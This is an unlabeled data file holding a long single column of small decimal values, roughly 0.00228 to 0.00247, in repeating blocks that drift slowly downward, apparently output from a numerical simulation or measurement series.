0.00246267
0.0024673
0.00246727
0.00246265
0.00246727
0.00246258
0.00245754
0.00245288
0.00245754
0.00245758
0.00245285
0.00245755
0.00245759
0.00245286
0.00245293
0.00245755
0.00245758
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.00246727
0.0024673
0.00246727
0.00246258
0.00246265
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00244315
0.00244787
0.00244784
0.00244324
0.00244784
0.00244322
0.00244316
0.00243813
0.00243813
0.00243348
0.00243817
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244317
0.00243814
0.00243818
0.00243353
0.00243347
0.00243817
0.00243814
0.00243346
0.00244315
0.00244784
0.00244787
0.00244324
0.00244784
0.00244316
0.00244322
0.00243813
0.00243813
0.00243348
0.00243817
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244317
0.00243814
0.00243818
0.00243347
0.00243353
0.00243814
0.00243817
0.00243346
0.00245756
0.00245281
0.00245281
0.00245751
0.00245751
0.00245285
0.00246267
0.0024673
0.00246724
0.00246261
0.00246257
0.00246727
0.00246277
0.00246267
0.0024673
0.00246724
0.00246261
0.00246277
0.00246727
0.00246257
0.00246257
0.00246724
0.00246724
0.00246253
0.00246729
0.00246253
0.00245755
0.00245286
0.00245755
0.00245305
0.00245751
0.00245758
0.00245295
0.00245755
0.00245286
0.00245755
0.00245305
0.00245758
0.00245751
0.00245295
0.00246256
0.00245752
0.00243812
0.00244314
0.00244315
0.0024478
0.0024478
0.00244785
0.00244311
0.00244311
0.00243814
0.00243365
0.00243815
0.00243346
0.00243817
0.00243811
0.00243355
0.00243814
0.00243365
0.00243815
0.00243346
0.00243811
0.00243817
0.00243356
0.00244325
0.0024478
0.00244787
0.00244318
0.00244334
0.00244784
0.00244315
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244315
0.00244334
0.00243815
0.00243341
0.00243341
0.00243811
0.00243811
0.00243345
0.00243812
0.00244314
0.00245755
0.00245759
0.00245293
0.00245286
0.00245758
0.00245755
0.00245286
0.00246256
0.0024673
0.00246258
0.0024626
0.00246726
0.00246257
0.00246267
0.0024673
0.00246727
0.00246264
0.00246727
0.00246258
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00245755
0.00245759
0.00245293
0.00245286
0.00245758
0.00245755
0.00245286
0.00246256
0.0024673
0.00246258
0.00246726
0.0024626
0.00246257
0.00246267
0.0024673
0.00246727
0.00246727
0.00246264
0.00246258
0.00245754
0.00245288
0.00245754
0.00245757
0.00245285
0.00244315
0.00244787
0.00244784
0.00244324
0.00244784
0.00244322
0.00244316
0.00243813
0.00243813
0.00243348
0.00243817
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244317
0.00243814
0.00243818
0.00243353
0.00243347
0.00243817
0.00243814
0.00243346
0.00244315
0.00244787
0.00244784
0.00244324
0.00244784
0.00244322
0.00244316
0.00243813
0.00243813
0.00243348
0.00243817
0.00243345
0.00244314
0.00244786
0.00244316
0.00244783
0.00244317
0.00243814
0.00243818
0.00243353
0.00243347
0.00243817
0.00243814
0.00243346
0.00246256
0.00245752
0.00246256
0.00245752
0.00244315
0.0024478
0.0024478
0.00244785
0.00244311
0.00244311
0.00243814
0.00243365
0.00243815
0.00243346
0.00243355
0.00243817
0.00243811
0.00243814
0.00243365
0.00243815
0.00243346
0.00243355
0.00243817
0.00243811
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244334
0.00244315
0.00244325
0.0024478
0.00244787
0.00244318
0.00244784
0.00244334
0.00244315
0.00243815
0.00243341
0.00243341
0.00243345
0.00243811
0.00243811
0.00243812
0.00244314
0.00243812
0.00244314
0.00242376
0.00241876
0.00242376
0.00241876
0.0024188
0.00241407
0.00241407
0.00241875
0.00241875
0.00241411
0.00242387
0.00242848
0.00242842
0.00242381
0.00242845
0.00242378
0.00242397
0.00242387
0.00242848
0.00242842
0.00242381
0.00242845
0.00242378
0.00242397
0.00242377
0.00242842
0.00242842
0.00242847
0.00242373
0.00242373
0.00241878
0.00241411
0.00241879
0.0024143
0.00241875
0.0024142
0.00241881
0.00241878
0.00241411
0.00241879
0.0024143
0.00241875
0.0024142
0.00241881
0.00239945
0.00240444
0.00239945
0.00240444
0.00240445
0.00240909
0.00240909
0.00240913
0.00240441
0.00240441
0.00239947
0.002395
0.00239948
0.00239481
0.00239944
0.0023995
0.0023949
0.00239947
0.002395
0.00239948
0.00239481
0.00239944
0.0023995
0.0023949
0.00240455
0.00240909
0.00240914
0.00240449
0.00240912
0.00240446
0.00240464
0.00240455
0.00240909
0.00240915
0.00240449
0.00240912
0.00240446
0.00240464
0.00239949
0.00239477
0.00239477
0.00239944
0.00239944
0.00239481
0.00241878
0.00241882
0.00241412
0.00241418
0.00241879
0.00241881
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242846
0.00242848
0.00242379
0.00242846
0.00242385
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00240446
0.00240913
0.00240915
0.00240454
0.00240912
0.00240446
0.00240452
0.00239947
0.00239946
0.00239484
0.00239481
0.0023995
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239482
0.00239488
0.00239481
0.00239948
0.0023995
0.00240446
0.00240913
0.00240915
0.00240454
0.00240912
0.00240446
0.00240452
0.00239947
0.00239947
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239482
0.00239488
0.00239948
0.0023995
0.00239481
0.0024188
0.00241407
0.00241407
0.00241875
0.00241875
0.00241411
0.00242387
0.00242848
0.00242842
0.00242381
0.00242378
0.00242846
0.00242397
0.00242387
0.00242848
0.00242842
0.00242381
0.00242397
0.00242845
0.00242378
0.00242377
0.00242842
0.00242842
0.00242374
0.00242847
0.00242373
0.00241878
0.00241411
0.00241879
0.0024143
0.00241875
0.00241881
0.0024142
0.00241878
0.00241411
0.00241879
0.0024143
0.00241881
0.00241875
0.0024142
0.00242376
0.00241876
0.00239945
0.00240444
0.00240445
0.00240909
0.00240909
0.00240914
0.00240441
0.00240441
0.00239947
0.002395
0.00239948
0.00239482
0.0023995
0.00239944
0.0023949
0.00239947
0.002395
0.00239948
0.00239481
0.00239944
0.0023995
0.0023949
0.00240455
0.00240909
0.00240915
0.00240449
0.00240464
0.00240912
0.00240446
0.00240455
0.00240909
0.00240915
0.00240449
0.00240912
0.00240446
0.00240464
0.00239949
0.00239477
0.00239477
0.00239944
0.00239944
0.00239481
0.00239945
0.00240444
0.00241878
0.00241882
0.00241412
0.00241418
0.00241879
0.00241881
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242846
0.00242848
0.00242379
0.00242846
0.00242385
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00240446
0.00240915
0.00240913
0.00240454
0.00240912
0.00240452
0.00240446
0.00239947
0.00239946
0.00239484
0.00239481
0.0023995
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239488
0.00239482
0.00239481
0.0023995
0.00239948
0.00240446
0.00240913
0.00240915
0.00240454
0.00240912
0.00240446
0.00240452
0.00239947
0.00239947
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239482
0.00239488
0.00239948
0.0023995
0.00239481
0.00241878
0.00241882
0.00241418
0.00241412
0.00241881
0.00241879
0.00241411
0.00242377
0.00242848
0.00242379
0.0024238
0.00242845
0.00242378
0.00242387
0.00242848
0.00242846
0.00242385
0.00242846
0.00242379
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00241878
0.00241882
0.00241412
0.00241418
0.00241879
0.00241881
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242846
0.00242848
0.00242846
0.00242379
0.00242385
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00240446
0.00240915
0.00240913
0.00240454
0.00240912
0.00240452
0.00240446
0.00239947
0.00239946
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239488
0.00239482
0.0023995
0.00239948
0.00239481
0.00240446
0.00240913
0.00240915
0.00240454
0.00240912
0.00240446
0.00240452
0.00239947
0.00239946
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239482
0.00239488
0.00239948
0.0023995
0.00239481
0.0024188
0.00241407
0.00241407
0.00241875
0.00241875
0.00241411
0.00242387
0.00242848
0.00242842
0.00242381
0.00242378
0.00242845
0.00242397
0.00242387
0.00242848
0.00242842
0.00242381
0.00242397
0.00242846
0.00242378
0.00242377
0.00242842
0.00242842
0.00242374
0.00242847
0.00242374
0.00241878
0.00241411
0.00241879
0.0024143
0.00241875
0.00241881
0.0024142
0.00241878
0.00241411
0.00241879
0.0024143
0.00241881
0.00241875
0.0024142
0.00242376
0.00241876
0.00239945
0.00240444
0.00240445
0.00240909
0.00240909
0.00240914
0.00240441
0.00240441
0.00239947
0.002395
0.00239948
0.00239482
0.0023995
0.00239944
0.0023949
0.00239947
0.002395
0.00239948
0.00239481
0.00239944
0.0023995
0.0023949
0.00240455
0.00240909
0.00240915
0.00240449
0.00240464
0.00240912
0.00240446
0.00240455
0.00240909
0.00240915
0.00240449
0.00240912
0.00240446
0.00240464
0.00239949
0.00239477
0.00239477
0.00239944
0.00239944
0.00239481
0.00239945
0.00240444
0.00241878
0.00241882
0.00241418
0.00241412
0.00241881
0.00241879
0.00241411
0.00242377
0.00242848
0.00242379
0.0024238
0.00242845
0.00242378
0.00242387
0.00242848
0.00242846
0.00242385
0.00242846
0.00242379
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00241878
0.00241882
0.00241418
0.00241412
0.00241881
0.00241879
0.00241411
0.00242377
0.00242848
0.00242379
0.00242845
0.0024238
0.00242378
0.00242387
0.00242848
0.00242846
0.00242846
0.00242384
0.00242379
0.00241878
0.00241413
0.00241877
0.00241881
0.0024141
0.00240446
0.00240915
0.00240913
0.00240454
0.00240912
0.00240452
0.00240446
0.00239947
0.00239947
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239948
0.00239951
0.00239488
0.00239482
0.0023995
0.00239948
0.00239481
0.00240446
0.00240915
0.00240913
0.00240454
0.00240912
0.00240452
0.00240446
0.00239947
0.00239946
0.00239484
0.0023995
0.00239481
0.00240445
0.00240915
0.00240447
0.00240912
0.00240448
0.00239947
0.00239951
0.00239488
0.00239482
0.0023995
0.00239948
0.00239481
0.00242376
0.00241876
0.00242376
0.00241876
0.00240445
0.00240909
0.00240909
0.00240913
0.00240441
0.00240441
0.00239947
0.00239499
0.00239948
0.00239481
0.0023949
0.0023995
0.00239944
0.00239947
0.002395
0.00239948
0.00239481
0.0023949
0.0023995
0.00239944
0.00240455
0.00240909
0.00240915
0.00240449
0.00240912
0.00240464
0.00240446
0.00240455
0.00240909
0.00240915
0.00240449
0.00240912
0.00240464
0.00240446
0.00239949
0.00239477
0.00239477
0.00239481
0.00239944
0.00239944
0.00239945
0.00240444
0.00239945
0.00240444
0.00238517
0.00238019
0.00238517
0.00238019
0.00238023
0.00237552
0.00237552
0.00238019
0.00238019
0.00237556
0.00238527
0.00238986
0.00238981
0.00238521
0.00238984
0.00238518
0.00238537
0.00238527
0.00238986
0.00238981
0.00238521
0.00238984
0.00238518
0.00238537
0.00238518
0.00238981
0.00238981
0.00238985
0.00238514
0.00238514
0.00238021
0.00237556
0.00238022
0.00237574
0.00238018
0.00237565
0.00238024
0.00238021
0.00237556
0.00238022
0.00237575
0.00238018
0.00237565
0.00238024
0.00236098
0.00236595
0.00236098
0.00236595
0.00236595
0.00237057
0.00237057
0.00237062
0.00236592
0.00236592
0.002361
0.00235654
0.00236101
0.00235636
0.00236097
0.00236102
0.00235645
0.002361
0.00235654
0.00236101
0.00235636
0.00236097
0.00236102
0.00235645
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236596
0.00236614
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236596
0.00236614
0.00236102
0.00235632
0.00235632
0.00236097
0.00236097
0.00235636
0.00238022
0.00238025
0.00237557
0.00237563
0.00238022
0.00238024
0.00237556
0.00238518
0.00238986
0.00238519
0.00238983
0.00238521
0.00238518
0.00238527
0.00238984
0.00238986
0.00238519
0.00238984
0.00238525
0.00238021
0.00237559
0.00238021
0.00238024
0.00237556
0.00236596
0.00237061
0.00237063
0.00236604
0.0023706
0.00236596
0.00236602
0.002361
0.00236099
0.00235638
0.00235636
0.00236102
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236104
0.00235637
0.00235642
0.00235636
0.00236101
0.00236103
0.00236596
0.00237061
0.00237063
0.00236604
0.0023706
0.00236596
0.00236602
0.002361
0.00236099
0.00235638
0.00236102
0.00235635
0.00236595
0.00237063
0.00236597
0.0023706
0.00236598
0.002361
0.00236104
0.00235637
0.00235642
0.00236101
0.00236103
0.00235636
0.00238023
0.00237552
0.00237552
0.00238019
0.00238019
0.00237556
0.00238527
0.00238986
0.00238981
0.00238521
0.00238518
0.00238983
0.00238537
0.00238527
0.00238986
0.00238981
0.00238521
0.00238537
0.00238984
0.00238518
0.00238518
0.00238981
0.00238981
0.00238514
0.00238985
0.00238514
0.00238021
0.00237556
0.00238022
0.00237574
0.00238018
0.00238024
0.00237565
0.00238021
0.00237557
0.00238022
0.00237574
0.00238024
0.00238018
0.00237565
0.00238517
0.00238019
0.00236098
0.00236595
0.00236595
0.00237057
0.00237057
0.00237062
0.00236592
0.00236592
0.002361
0.00235654
0.00236101
0.00235636
0.00236102
0.00236097
0.00235645
0.002361
0.00235654
0.00236101
0.00235636
0.00236097
0.00236102
0.00235645
0.00236604
0.00237057
0.00237062
0.00236599
0.00236614
0.0023706
0.00236596
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236596
0.00236614
0.00236101
0.00235632
0.00235632
0.00236097
0.00236097
0.00235635
0.00236098
0.00236594
0.00238022
0.00238025
0.00237557
0.00237563
0.00238022
0.00238024
0.00237556
0.00238518
0.00238986
0.00238519
0.00238983
0.00238521
0.00238518
0.00238527
0.00238984
0.00238986
0.00238519
0.00238984
0.00238525
0.00238021
0.00237559
0.0023802
0.00238024
0.00237556
0.00236596
0.00237063
0.00237061
0.00236604
0.0023706
0.00236602
0.00236596
0.002361
0.00236099
0.00235638
0.00235636
0.00236103
0.00236595
0.00237063
0.00236597
0.0023706
0.00236598
0.002361
0.00236104
0.00235642
0.00235637
0.00235636
0.00236103
0.00236101
0.00236596
0.00237061
0.00237063
0.00236604
0.0023706
0.00236596
0.00236602
0.002361
0.00236099
0.00235638
0.00236102
0.00235636
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236104
0.00235637
0.00235642
0.00236101
0.00236103
0.00235636
0.00238022
0.00238025
0.00237563
0.00237557
0.00238024
0.00238022
0.00237556
0.00238518
0.00238986
0.00238519
0.00238521
0.00238983
0.00238518
0.00238527
0.00238986
0.00238984
0.00238525
0.00238984
0.00238519
0.00238021
0.00237559
0.0023802
0.00238024
0.00237556
0.00238022
0.00238025
0.00237557
0.00237563
0.00238022
0.00238024
0.00237556
0.00238518
0.00238986
0.00238519
0.00238983
0.0023852
0.00238518
0.00238527
0.00238984
0.00238986
0.00238984
0.00238519
0.00238525
0.00238021
0.00237558
0.0023802
0.00238024
0.00237556
0.00236596
0.00237063
0.00237061
0.00236604
0.0023706
0.00236602
0.00236596
0.002361
0.00236099
0.00235638
0.00236102
0.00235635
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236103
0.00235642
0.00235637
0.00236103
0.00236101
0.00235636
0.00236596
0.00237061
0.00237063
0.00236604
0.0023706
0.00236596
0.00236602
0.002361
0.00236099
0.00235638
0.00236102
0.00235635
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236103
0.00235637
0.00235642
0.00236101
0.00236103
0.00235636
0.00238023
0.00237552
0.00237552
0.00238019
0.00238019
0.00237556
0.00238527
0.00238986
0.00238981
0.00238521
0.00238518
0.00238984
0.00238537
0.00238527
0.00238986
0.00238981
0.00238521
0.00238536
0.00238983
0.00238518
0.00238518
0.00238981
0.00238981
0.00238514
0.00238985
0.00238514
0.00238021
0.00237556
0.00238022
0.00237575
0.00238018
0.00238023
0.00237565
0.00238021
0.00237556
0.00238022
0.00237574
0.00238023
0.00238018
0.00237565
0.00238517
0.00238019
0.00236098
0.00236595
0.00236595
0.00237057
0.00237057
0.00237062
0.00236592
0.00236592
0.002361
0.00235654
0.00236101
0.00235636
0.00236102
0.00236097
0.00235645
0.002361
0.00235654
0.00236101
0.00235636
0.00236097
0.00236102
0.00235645
0.00236604
0.00237057
0.00237062
0.00236599
0.00236614
0.0023706
0.00236596
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236596
0.00236614
0.00236101
0.00235632
0.00235632
0.00236097
0.00236097
0.00235636
0.00236098
0.00236594
0.00238022
0.00238025
0.00237563
0.00237557
0.00238024
0.00238022
0.00237556
0.00238518
0.00238986
0.00238519
0.0023852
0.00238983
0.00238518
0.00238527
0.00238986
0.00238984
0.00238525
0.00238984
0.00238519
0.00238021
0.00237559
0.0023802
0.00238024
0.00237556
0.00238022
0.00238025
0.00237563
0.00237557
0.00238024
0.00238022
0.00237556
0.00238517
0.00238986
0.00238519
0.00238983
0.0023852
0.00238518
0.00238527
0.00238986
0.00238984
0.00238984
0.00238525
0.00238519
0.00238021
0.00237558
0.0023802
0.00238024
0.00237556
0.00236596
0.00237063
0.00237061
0.00236604
0.0023706
0.00236602
0.00236596
0.002361
0.00236099
0.00235638
0.00236102
0.00235635
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236103
0.00235642
0.00235637
0.00236103
0.00236101
0.00235636
0.00236596
0.00237063
0.00237061
0.00236604
0.0023706
0.00236602
0.00236596
0.002361
0.00236099
0.00235638
0.00236102
0.00235635
0.00236595
0.00237062
0.00236597
0.0023706
0.00236598
0.002361
0.00236103
0.00235642
0.00235637
0.00236103
0.00236101
0.00235636
0.00238517
0.00238019
0.00238517
0.00238019
0.00236595
0.00237057
0.00237057
0.00237061
0.00236592
0.00236592
0.002361
0.00235654
0.00236101
0.00235636
0.00235645
0.00236102
0.00236097
0.002361
0.00235654
0.00236101
0.00235636
0.00235645
0.00236102
0.00236097
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236613
0.00236596
0.00236604
0.00237057
0.00237062
0.00236599
0.0023706
0.00236614
0.00236596
0.00236101
0.00235632
0.00235632
0.00235635
0.00236097
0.00236097
0.00236098
0.00236594
0.00236098
0.00236594
0.00234677
0.00234182
0.00234677
0.00234182
0.00234185
0.00233717
0.00233717
0.00234181
0.00234181
0.0023372
0.00234686
0.00235143
0.00235138
0.00234681
0.00235141
0.00234678
0.00234695
0.00234686
0.00235143
0.00235138
0.00234681
0.00235141
0.00234678
0.00234695
0.00234677
0.00235139
0.00235139
0.00235143
0.00234674
0.00234674
0.00234183
0.0023372
0.00234184
0.00233738
0.00234181
0.00233729
0.00234185
0.00234183
0.0023372
0.00234184
0.00233738
0.00234181
0.00233729
0.00234185
0.0023227
0.00232763
0.0023227
0.00232763
0.00232764
0.00233224
0.00233224
0.00233228
0.00232761
0.00232761
0.00232271
0.00231826
0.00232272
0.00231809
0.00232269
0.00232273
0.00231818
0.00232271
0.00231826
0.00232272
0.00231809
0.00232268
0.00232273
0.00231818
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232764
0.00232781
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232764
0.00232781
0.00232273
0.00231806
0.00231806
0.00232269
0.00232269
0.00231809
0.00234184
0.00234187
0.00233721
0.00233726
0.00234184
0.00234186
0.00233721
0.00234677
0.00235143
0.00234679
0.00235141
0.0023468
0.00234678
0.00234686
0.00235142
0.00235144
0.00234679
0.00235141
0.00234684
0.00234183
0.00233722
0.00234183
0.00234186
0.0023372
0.00232764
0.00233227
0.00233229
0.00232772
0.00233227
0.00232765
0.0023277
0.00232271
0.0023227
0.00231811
0.00231809
0.00232274
0.00232764
0.00233229
0.00232765
0.00233227
0.00232766
0.00232272
0.00232274
0.0023181
0.00231815
0.00231809
0.00232272
0.00232274
0.00232764
0.00233227
0.00233229
0.00232772
0.00233227
0.00232765
0.0023277
0.00232271
0.0023227
0.00231811
0.00232274
0.00231809
0.00232764
0.00233229
0.00232765
0.00233227
0.00232766
0.00232272
0.00232274
0.0023181
0.00231815
0.00232272
0.00232274
0.00231809
0.00234185
0.00233717
0.00233717
0.00234181
0.00234181
0.0023372
0.00234686
0.00235143
0.00235138
0.00234681
0.00234678
0.00235141
0.00234695
0.00234686
0.00235143
0.00235138
0.0023468
0.00234695
0.00235141
0.00234678
0.00234677
0.00235138
0.00235139
0.00234674
0.00235143
0.00234674
0.00234183
0.0023372
0.00234184
0.00233738
0.0023418
0.00234185
0.00233729
0.00234183
0.0023372
0.00234184
0.00233738
0.00234185
0.0023418
0.00233729
0.00234676
0.00234182
0.0023227
0.00232763
0.00232764
0.00233224
0.00233224
0.00233228
0.00232761
0.00232761
0.00232271
0.00231826
0.00232272
0.00231809
0.00232273
0.00232268
0.00231818
0.00232271
0.00231826
0.00232272
0.00231809
0.00232268
0.00232273
0.00231818
0.00232773
0.00233224
0.00233228
0.00232767
0.00232782
0.00233226
0.00232764
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232764
0.00232781
0.00232273
0.00231806
0.00231806
0.00232269
0.00232269
0.00231809
0.0023227
0.00232763
0.00234184
0.00234187
0.00233721
0.00233726
0.00234184
0.00234186
0.00233721
0.00234677
0.00235144
0.00234679
0.00235141
0.0023468
0.00234678
0.00234685
0.00235142
0.00235144
0.00234679
0.00235142
0.00234684
0.00234183
0.00233723
0.00234183
0.00234186
0.0023372
0.00232764
0.00233229
0.00233227
0.00232772
0.00233227
0.0023277
0.00232765
0.00232271
0.0023227
0.00231811
0.00231809
0.00232274
0.00232764
0.00233229
0.00232765
0.00233227
0.00232766
0.00232272
0.00232274
0.00231815
0.0023181
0.00231809
0.00232274
0.00232272
0.00232764
0.00233227
0.00233229
0.00232772
0.00233227
0.00232765
0.0023277
0.00232271
0.0023227
0.00231811
0.00232274
0.00231809
0.00232764
0.00233229
0.00232765
0.00233227
0.00232766
0.00232272
0.00232274
0.0023181
0.00231815
0.00232272
0.00232274
0.00231809
0.00234184
0.00234187
0.00233726
0.00233721
0.00234186
0.00234184
0.0023372
0.00234677
0.00235143
0.00234679
0.0023468
0.00235141
0.00234678
0.00234685
0.00235144
0.00235142
0.00234684
0.00235141
0.00234678
0.00234183
0.00233722
0.00234182
0.00234186
0.0023372
0.00234184
0.00234187
0.00233721
0.00233726
0.00234184
0.00234186
0.0023372
0.00234677
0.00235143
0.00234679
0.00235141
0.0023468
0.00234678
0.00234685
0.00235142
0.00235144
0.00235141
0.00234678
0.00234684
0.00234183
0.00233722
0.00234182
0.00234186
0.0023372
0.00232764
0.00233229
0.00233227
0.00232772
0.00233227
0.0023277
0.00232765
0.00232271
0.0023227
0.00231811
0.00232273
0.00231809
0.00232764
0.00233229
0.00232765
0.00233226
0.00232766
0.00232272
0.00232274
0.00231815
0.0023181
0.00232273
0.00232272
0.00231809
0.00232764
0.00233227
0.00233229
0.00232772
0.00233227
0.00232765
0.0023277
0.00232271
0.0023227
0.00231811
0.00232273
0.00231809
0.00232764
0.00233229
0.00232765
0.00233226
0.00232766
0.00232272
0.00232274
0.0023181
0.00231815
0.00232272
0.00232273
0.00231809
0.00234185
0.00233717
0.00233717
0.00234181
0.00234181
0.0023372
0.00234686
0.00235143
0.00235138
0.00234681
0.00234678
0.00235141
0.00234695
0.00234686
0.00235143
0.00235138
0.00234681
0.00234695
0.00235141
0.00234678
0.00234677
0.00235139
0.00235139
0.00234674
0.00235143
0.00234674
0.00234183
0.0023372
0.00234184
0.00233738
0.00234181
0.00234185
0.00233729
0.00234183
0.0023372
0.00234184
0.00233738
0.00234185
0.0023418
0.00233729
0.00234677
0.00234182
0.0023227
0.00232763
0.00232764
0.00233224
0.00233224
0.00233228
0.00232761
0.00232761
0.00232271
0.00231826
0.00232272
0.00231809
0.00232273
0.00232268
0.00231818
0.00232271
0.00231826
0.00232272
0.00231809
0.00232268
0.00232273
0.00231818
0.00232773
0.00233224
0.00233228
0.00232767
0.00232782
0.00233226
0.00232764
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232764
0.00232782
0.00232273
0.00231806
0.00231806
0.00232269
0.00232269
0.00231809
0.0023227
0.00232763
0.00234184
0.00234187
0.00233726
0.00233721
0.00234186
0.00234184
0.0023372
0.00234677
0.00235144
0.00234679
0.0023468
0.00235141
0.00234678
0.00234685
0.00235144
0.00235142
0.00234684
0.00235141
0.00234678
0.00234183
0.00233722
0.00234183
0.00234186
0.0023372
0.00234184
0.00234187
0.00233726
0.00233721
0.00234186
0.00234184
0.0023372
0.00234677
0.00235143
0.00234679
0.00235141
0.0023468
0.00234678
0.00234685
0.00235144
0.00235142
0.00235141
0.00234684
0.00234678
0.00234183
0.00233722
0.00234182
0.00234186
0.0023372
0.00232764
0.00233229
0.00233227
0.00232772
0.00233227
0.0023277
0.00232765
0.00232271
0.0023227
0.00231811
0.00232274
0.00231809
0.00232764
0.00233229
0.00232765
0.00233226
0.00232766
0.00232272
0.00232274
0.00231815
0.0023181
0.00232274
0.00232272
0.00231809
0.00232764
0.00233229
0.00233227
0.00232772
0.00233227
0.0023277
0.00232765
0.00232271
0.0023227
0.00231811
0.00232274
0.00231809
0.00232764
0.00233229
0.00232765
0.00233226
0.00232766
0.00232272
0.00232274
0.00231815
0.0023181
0.00232274
0.00232272
0.00231809
0.00234677
0.00234182
0.00234677
0.00234182
0.00232764
0.00233224
0.00233224
0.00233228
0.0023276
0.00232761
0.00232271
0.00231826
0.00232272
0.00231809
0.00231818
0.00232273
0.00232268
0.00232271
0.00231826
0.00232272
0.00231809
0.00231818
0.00232273
0.00232268
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232782
0.00232764
0.00232773
0.00233224
0.00233228
0.00232767
0.00233226
0.00232781
0.00232764
0.00232273
0.00231806
0.00231806
0.00231809
0.00232269
0.00232269
0.0023227
0.00232763
0.0023227
0.00232763
0.00230854
0.00230362
0.00230854
0.00230362
0.00230365
0.00229899
0.00229899
0.00230361
0.00230361
0.00229902
0.00230864
0.00231318
0.00231314
0.00230858
0.00231316
0.00230855
0.00230872
0.00230864
0.00231318
0.00231314
0.00230858
0.00231316
0.00230855
0.00230872
0.00230855
0.00231314
0.00231314
0.00231318
0.00230852
0.00230852
0.00230363
0.00229902
0.00230364
0.00229919
0.00230361
0.00229911
0.00230365
0.00230363
0.00229902
0.00230364
0.00229919
0.00230361
0.00229911
0.00230365
0.00228458
0.0022895
0.00228458
0.0022895
0.0022895
0.00229409
0.00229409
0.00229413
0.00228947
0.00228947
0.00228459
0.00228016
0.0022846
0.00228
0.00228457
0.00228461
0.00228008
0.00228459
0.00228016
0.00228461
0.00228
0.00228457
0.00228461
0.00228008
0.00228959
0.00229409
0.00229412
0.00228953
0.00229411
0.00228951
0.00228967
0.00228959
0.00229409
0.00229412
0.00228953
0.00229411
0.00228951
0.00228967
0.00228461
0.00227996
0.00227996
0.00228458
0.00228458
0.00227999
0.00230364
0.00230367
0.00229903
0.00229908
0.00230364
0.00230366
0.00229903
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231317
0.00231319
0.00230856
0.00231317
0.00230861
0.00230363
0.00229904
0.00230363
0.00230366
0.00229902
0.00228951
0.00229412
0.00229413
0.00228958
0.00229412
0.00228951
0.00228956
0.0022846
0.00228459
0.00228002
0.00227999
0.00228462
0.0022895
0.00229413
0.00228952
0.00229411
0.00228952
0.0022846
0.00228463
0.00228001
0.00228005
0.00228
0.00228461
0.00228462
0.00228951
0.00229412
0.00229413
0.00228958
0.00229412
0.00228951
0.00228956
0.0022846
0.00228459
0.00228002
0.00228462
0.00227999
0.0022895
0.00229413
0.00228952
0.00229411
0.00228952
0.0022846
0.00228463
0.00228001
0.00228005
0.00228461
0.00228462
0.00228
0.00230365
0.00229899
0.00229899
0.00230361
0.00230361
0.00229902
0.00230864
0.00231318
0.00231314
0.00230858
0.00230855
0.00231316
0.00230872
0.00230864
0.00231318
0.00231314
0.00230858
0.00230872
0.00231316
0.00230855
0.00230855
0.00231314
0.00231314
0.00230852
0.00231318
0.00230852
0.00230363
0.00229902
0.00230364
0.00229919
0.00230361
0.00230365
0.00229911
0.00230363
0.00229902
0.00230364
0.00229919
0.00230365
0.00230361
0.00229911
0.00230854
0.00230362
0.00228458
0.0022895
0.0022895
0.00229409
0.00229409
0.00229412
0.00228947
0.00228947
0.00228459
0.00228016
0.0022846
0.00228
0.00228461
0.00228457
0.00228008
0.00228459
0.00228016
0.0022846
0.00228
0.00228457
0.00228461
0.00228008
0.00228959
0.00229408
0.00229412
0.00228953
0.00228967
0.00229411
0.00228951
0.00228959
0.00229408
0.00229412
0.00228953
0.00229411
0.00228951
0.00228967
0.00228461
0.00227996
0.00227996
0.00228458
0.00228458
0.00227999
0.00228458
0.00228949
0.00230364
0.00230367
0.00229903
0.00229908
0.00230364
0.00230366
0.00229903
0.00230855
0.00231319
0.00230856
0.00231317
0.00230857
0.00230855
0.00230863
0.00231317
